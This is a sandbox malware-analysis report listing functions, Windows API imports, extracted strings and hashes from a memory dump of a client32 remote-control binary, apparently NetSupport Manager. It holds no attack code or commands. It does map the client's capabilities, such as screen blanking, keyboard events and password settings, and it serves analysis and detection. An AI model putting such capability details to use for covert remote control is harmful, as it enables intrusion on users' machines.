Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: BringCloseCurrentHandleIconicThreadWindow
String ID:
API String ID: 282708701-0
Opcode ID: f8c1720ab67cf9ac53e7b4b7fd99623febfafd63df5ab86bd196bdc2a1eef6a6
Instruction ID: 68da218cc8d3d2acc09eaaaeac647b59bddd30eea9b0a9a447bb8f190febde42
Opcode Fuzzy Hash: f8c1720ab67cf9ac53e7b4b7fd99623febfafd63df5ab86bd196bdc2a1eef6a6
Instruction Fuzzy Hash: 2221C636A006069FE720DE69E4487EAF3E4FB8C328F50C16AE55A87240DB76E841CF55

Function 11059290 Relevance: 4.5, APIs: 3, Instructions: 19windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,1105992A,DuplicateHandle), ref: 110592A1
FormatMessageA.KERNEL32(00001100,00000000,00000000,?,?,1105992A,DuplicateHandle), ref: 110592AF
LocalFree.KERNEL32(?,?,?,1105992A,DuplicateHandle), ref: 110592B9

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID:
API String ID: 1365068426-0
Opcode ID: c4da030cc566985fed10b8ae72e49a46dab86cf533d5b385c533f073b0b7a5cb
Instruction ID: 5b7cf9c0659eada95368eb5e30aa7fe70508538aa6eda4fa9add4fab25305eb2
Opcode Fuzzy Hash: c4da030cc566985fed10b8ae72e49a46dab86cf533d5b385c533f073b0b7a5cb
Instruction Fuzzy Hash: D2D05E79684308BBE2159BD0CC4AFADB7ACD70CB16F200166FB01961C0DAB169008B76

Function 1110F530 Relevance: 3.1, APIs: 2, Instructions: 54keyboardCOMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 1110F582
keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 1110F5B5

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ControlDevicekeybd_event
String ID:
API String ID: 1421710848-0
Opcode ID: 407e97887e86df9f2c0a03872b9b60b55f09692966eacca027f370d3071f714e
Instruction ID: f16cb9fa246973b130d8d4b772b22c9a054ff2d8a1491d36678eaa30799a1364
Opcode Fuzzy Hash: 407e97887e86df9f2c0a03872b9b60b55f09692966eacca027f370d3071f714e
Instruction Fuzzy Hash: 91012833E01A167AF30189699D46FA7FB5C9B45721F014238EE19E71C0DA659904C7A2

Function 110A9020 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32(00000000,002A400C,00000000,00000000,00000000,00000000,11030F1E,00000000), ref: 110A9040

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ControlDevice
String ID:
API String ID: 2352790924-0
Opcode ID: bee1594c9b993945fc66beb885ff9e6d2c70a72c6a38e995273342c6cce042f3
Instruction ID: e6d1365b3b06df1e9415c01cc9d8350cc9404220fab0c618bb11d61061ff1502
Opcode Fuzzy Hash: bee1594c9b993945fc66beb885ff9e6d2c70a72c6a38e995273342c6cce042f3
Instruction Fuzzy Hash: 48E0CDF5A4421CBF9314DEF99CC1CA7B79CD6463687100399F529C3141E5729D009630

Function 110B7290 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 110B6B00: GetLastError.KERNEL32(1110C55B,11190A88,?,?,110291D1,?,11190A88,1110C55B,00000000), ref: 110B6B2C
Part of subcall function 110B6B00: _strrchr.LIBCMT ref: 110B6B3B
Part of subcall function 110B6B00: _strrchr.LIBCMT ref: 110B6B5D
Part of subcall function 110B6B00: GetTickCount.KERNEL32 ref: 110B6B8D
Part of subcall function 110B6B00: GetTickCount.KERNEL32 ref: 110B6BB8
Part of subcall function 110B6B00: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110B6BDC
Part of subcall function 110B6B00: TranslateMessage.USER32(?), ref: 110B6BE5
Part of subcall function 110B6B00: DispatchMessageA.USER32(?), ref: 110B6BEE

ExitProcess.KERNEL32 ref: 110B72D2

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$CountTick_strrchr$DispatchErrorExitLastProcessTranslate
String ID:
API String ID: 3353803068-0
Opcode ID: 06c9df3ca406207d7238bdc876dcff0f4e22ad641d992ae1b7e140b03e8b296d
Instruction ID: ce9d5818c6b3e3d75bb82768abb96607a537f9dfa1c9a02e20bcdd361acef7c7
Opcode Fuzzy Hash: 06c9df3ca406207d7238bdc876dcff0f4e22ad641d992ae1b7e140b03e8b296d
Instruction Fuzzy Hash: A5E039B860020A9FFB16DFD8C8C0BBA73E8FB08708F044024FA1847281D670A8408B75

Function 110495E0 Relevance: 49.2, APIs: 6, Strings: 22, Instructions: 195COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 11049660
__itow.LIBCMT ref: 110496BD
wsprintfA.USER32 ref: 11049749
_sprintf.LIBCMT ref: 110497F5
_free.LIBCMT ref: 11049801
_sprintf.LIBCMT ref: 11049834

Strings

STATE, xrefs: 11049709
RESEND, xrefs: 11049717
ACTIVATE, xrefs: 110496E6
BLOCK, xrefs: 11049710
EXECUTE, xrefs: 11049684
UNREGISTER, xrefs: 11049725
%s %s, xrefs: 1104988C
,%x, xrefs: 11049821
TC_FILTER, xrefs: 110496A0
INIT, xrefs: 1104967D, 110496F4
,%dK, xrefs: 11049817
POLL, xrefs: 110496FB
TC_LIST, xrefs: 110496A7
REGISTER, xrefs: 1104971E
DATA_OVERWRITE, xrefs: 110496AE
DATA, xrefs: 11049692
INFO, xrefs: 11049699, 11049702
CLOSE, xrefs: 1104968B, 110496DF
%s PLUGIN_%s CMD_%s %hs, xrefs: 1104973D
START, xrefs: 110496D8, 11049734
CHANGE, xrefs: 110496ED
,%.*s, xrefs: 110497EF

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __itow_sprintf$_freewsprintf
String ID: %s %s$%s PLUGIN_%s CMD_%s %hs$,%.*s$,%dK$,%x$ACTIVATE$BLOCK$CHANGE$CLOSE$DATA$DATA_OVERWRITE$EXECUTE$INFO$INIT$POLL$REGISTER$RESEND$START$STATE$TC_FILTER$TC_LIST$UNREGISTER
API String ID: 3257145489-1307768689
Opcode ID: d1e2b4759ddcb89aad79aafaded510befec1c583f1315cc2030a734cf4557b8a
Instruction ID: cdd84283306ff48d96025544587da65754e4ceb7f0d5a25df35768a9cec4e56b
Opcode Fuzzy Hash: d1e2b4759ddcb89aad79aafaded510befec1c583f1315cc2030a734cf4557b8a
Instruction Fuzzy Hash: 1471D571D08228DBEB11CF58E9C0B9DB7B8FB09204F6081F9D955A7640FB31AE45CB85

Function 11053520 Relevance: 47.7, APIs: 12, Strings: 15, Instructions: 463COMMON

Download Yara Rule

APIs

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

std::exception::exception.LIBCMT ref: 11053720
__CxxThrowException@8.LIBCMT ref: 11053735

Part of subcall function 1105D350: __wcstoi64.LIBCMT ref: 1105D38D

wsprintfA.USER32 ref: 11053AA5

Strings

Fs, xrefs: 11053B35
platformid, xrefs: 11053584
MinimumEncryption, xrefs: 11053B79
DEMO, xrefs: 11053823
DisableInventory, xrefs: 11053A7F, 11053AC9
UserAcknowledge, xrefs: 1105386B
_License, xrefs: 11053803
Usernames, xrefs: 110538AB
Password, xrefs: 11053905
_debug, xrefs: 11053589
Client, xrefs: 11053870, 110538B0, 1105390A, 11053921, 11053948, 11053A84, 11053ACE, 11053B7E
serial_no, xrefs: 110537FE
Inactivity, xrefs: 11053943
UseNTSecurity, xrefs: 1105391C
%spciinv.dll, xrefs: 11053A9F

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$Exception@8Throw__wcstoi64_malloc_memsetstd::exception::exception
String ID: Fs$%spciinv.dll$Client$DEMO$DisableInventory$Inactivity$MinimumEncryption$Password$UseNTSecurity$UserAcknowledge$Usernames$_License$_debug$platformid$serial_no
API String ID: 3148379806-2783924444
Opcode ID: 266433bcf66a3bbe1549486d252f7bee3cc7f25af06504de0a0a45315832338b
Instruction ID: 3760cd0df860b50928fc15fcaed87cdf7bd70b4af21edf96d6cda88f852dd69a
Opcode Fuzzy Hash: 266433bcf66a3bbe1549486d252f7bee3cc7f25af06504de0a0a45315832338b
Instruction Fuzzy Hash: 2C02B274E41219AFEB54DFA0CC91FEEB7B5AF44708F0040A9F505AB284EB75AA44CB91

Function 1104F1F0 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 316filepipethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 1104D7A0: SetEvent.KERNEL32(?), ref: 1104D857
Part of subcall function 1104D7A0: CloseHandle.KERNEL32(?), ref: 1104D8BD
Part of subcall function 1104D7A0: CloseHandle.KERNEL32(?), ref: 1104D8CF

wsprintfA.USER32 ref: 1104F294
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 1104F2BD
GetLastError.KERNEL32 ref: 1104F2C8
SetNamedPipeHandleState.KERNEL32(00000000,00000002,00000000,00000000), ref: 1104F2F5
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,33E68B52), ref: 1104F30B
CloseHandle.KERNEL32(00000000,Function_0003BFA0,00000001,00000000), ref: 1104F3B5
GetWindowThreadProcessId.USER32(?,?), ref: 1104F3C3
OpenProcess.KERNEL32(00000400,00000000,?), ref: 1104F3D7
GetPriorityClass.KERNEL32(00000000), ref: 1104F3EC

Part of subcall function 110B69B0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B69D6
Part of subcall function 110B69B0: GetProcAddress.KERNEL32(00000000), ref: 110B69DD
Part of subcall function 110B69B0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B69F3

GetDC.USER32(00000000), ref: 1104F3FA
GetACP.KERNEL32(View,CacheSize,00000400,00000000), ref: 1104F44E
GetDeviceCaps.GDI32(00000000,0000000E), ref: 1104F45D
GetDeviceCaps.GDI32(00000000,0000000C), ref: 1104F46C
GetDeviceCaps.GDI32(?,00000026), ref: 1104F48A
GetDeviceCaps.GDI32(?,00000068), ref: 1104F49A
ReleaseDC.USER32(00000000,?), ref: 1104F4C8
GetSystemMetrics.USER32(0000004C), ref: 1104F4D6
GetSystemMetrics.USER32(0000004D), ref: 1104F4E0

Strings

View, xrefs: 1104F414
\\.\pipe\nsm_ctl32_show_%d, xrefs: 1104F28E
Fs, xrefs: 1104F45D, 1104F46C, 1104F48A, 1104F49A
CacheSize, xrefs: 1104F40D
idata->hShowEvent, xrefs: 1104F325
Error creating hShowPipe, e=%d, xrefs: 1104F2CF
CLTCONN.CPP, xrefs: 1104F320
Show enabling mirror, xrefs: 1104F64E

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Handle$CapsDevice$CloseProcess$CreateEventMetricsSystem$AddressClassCurrentErrorFileLastModuleNamedOpenPipePriorityProcReleaseStateThreadWindowwsprintf
String ID: Fs$CLTCONN.CPP$CacheSize$Error creating hShowPipe, e=%d$Show enabling mirror$View$\\.\pipe\nsm_ctl32_show_%d$idata->hShowEvent
API String ID: 1070019554-1506342047
Opcode ID: 0567f79965dcf129f918992acc80c23c636f3ceb48c80164b3fd5d7e4d3c2622
Instruction ID: 9e05fd3e99d1ba299a5e69b94f78ab0cc0e2b5ceb0091134e64afd2af46fbdf2
Opcode Fuzzy Hash: 0567f79965dcf129f918992acc80c23c636f3ceb48c80164b3fd5d7e4d3c2622
Instruction Fuzzy Hash: 2DD13DB4E007169FD715CF78C888B9EB7F5BB48308F1085ADE92A97284DB70AA44CF51

Function 11139170 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 229registrylibraryloaderCOMMON

Download Yara Rule

APIs

LoadCursorA.USER32(00000000,00007F00), ref: 111391CA
GetStockObject.GDI32(00000004), ref: 111391D5
RegisterClassA.USER32(?), ref: 111391E9
GetLastError.KERNEL32 ref: 1113925F
GetLastError.KERNEL32 ref: 1113927B
CreateWindowExA.USER32(00080020,NSMBlankWnd,Blank,88800000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 111392E5
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000053), ref: 1113934E
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000053), ref: 1113937D
UpdateWindow.USER32(?), ref: 111393AB
GetProcAddress.KERNEL32(?,DwmEnableComposition), ref: 111393C6
SetTimer.USER32(?,00000081,00000014,00000000), ref: 1113940A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,110F553C), ref: 11139414

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,110F553C), ref: 11139432

Strings

m_hWnd, xrefs: 1113932B, 11139360, 1113939A, 111393F0
Blank, xrefs: 111392D6
Error. RegisterClass(%s) failed, e=%d, xrefs: 11139282
BlankWnd x%x created, w=%d, h=%d, xrefs: 111392F9
BlankHeight, xrefs: 1113921B
Error setting blankwnd timer, e=%d, xrefs: 1113941B
NSMBlankWnd, xrefs: 111391E2, 1113926B, 11139281, 111392DB
Error. BlankWnd not created, e=%d, xrefs: 11139439
DwmEnableComposition, xrefs: 111393C0
Info. Class %s already registered, xrefs: 1113926C
_debug, xrefs: 1113920F, 1113922C
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11139326, 1113935B, 11139395, 111393EB
BlankWidth, xrefs: 1113920A

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$Window$AddressClassCreateCursorExitLoadMessageObjectProcProcessRegisterStockTimerUpdatewsprintf
String ID: Blank$BlankHeight$BlankWidth$BlankWnd x%x created, w=%d, h=%d$DwmEnableComposition$Error setting blankwnd timer, e=%d$Error. BlankWnd not created, e=%d$Error. RegisterClass(%s) failed, e=%d$Info. Class %s already registered$NSMBlankWnd$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1116282658-3566152235
Opcode ID: ae1d6d665057945294fb5caf0d7440714d9c9a6a9dc058bdebb4af3caff339a8
Instruction ID: 9e390ec76a212db177a503b5f2ce42833d95bb2e295e511e8226f65dc8590110
Opcode Fuzzy Hash: ae1d6d665057945294fb5caf0d7440714d9c9a6a9dc058bdebb4af3caff339a8
Instruction Fuzzy Hash: F281B2B5B0070AAFE710DFA5DC81FEEF7B4EB48719F104529F259A6280E770A540CBA5

Function 110432E0 Relevance: 44.1, APIs: 16, Strings: 9, Instructions: 327windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 11141160: ExpandEnvironmentStringsA.KERNEL32(7693795C,?,00000104,7693795C), ref: 11141187

ExtractIconA.SHELL32(11000000,00000000,00000000), ref: 11043329
_memset.LIBCMT ref: 11043375
_strncpy.LIBCMT ref: 110433A3
wsprintfA.USER32 ref: 11043488
_strncpy.LIBCMT ref: 110434D1
_strncpy.LIBCMT ref: 11043505
SetDlgItemTextA.USER32(?,?,?), ref: 11043522
SetDlgItemTextA.USER32(?,00000002,?), ref: 11043557
SetTimer.USER32(00000000,00000001,000003E8,00000000), ref: 110435A6
SetDlgItemTextA.USER32(?,?,11190240), ref: 110435BE
BringWindowToTop.USER32(?), ref: 110435FA
SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000003), ref: 11043613
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 11043628

Part of subcall function 1115B7F0: SetForegroundWindow.USER32(?), ref: 1115B81E

MessageBeep.USER32(000000FF), ref: 11043635

Part of subcall function 1105D350: __wcstoi64.LIBCMT ref: 1105D38D

GetDlgItem.USER32(?,00000002), ref: 1104365A
SetFocus.USER32(00000000), ref: 11043661

Strings

AckDlgDisplayText, xrefs: 1104340E
m_hWnd, xrefs: 1104358C
AckDlgTimeOut, xrefs: 1104355D
helpdesk.ico, xrefs: 1104330C
Client, xrefs: 11043413, 11043562
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11043587
*UserAckRejectDefault, xrefs: 1104363F
*UserAckWording, xrefs: 110433E4
*UserAckRejectWording, xrefs: 11043537

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
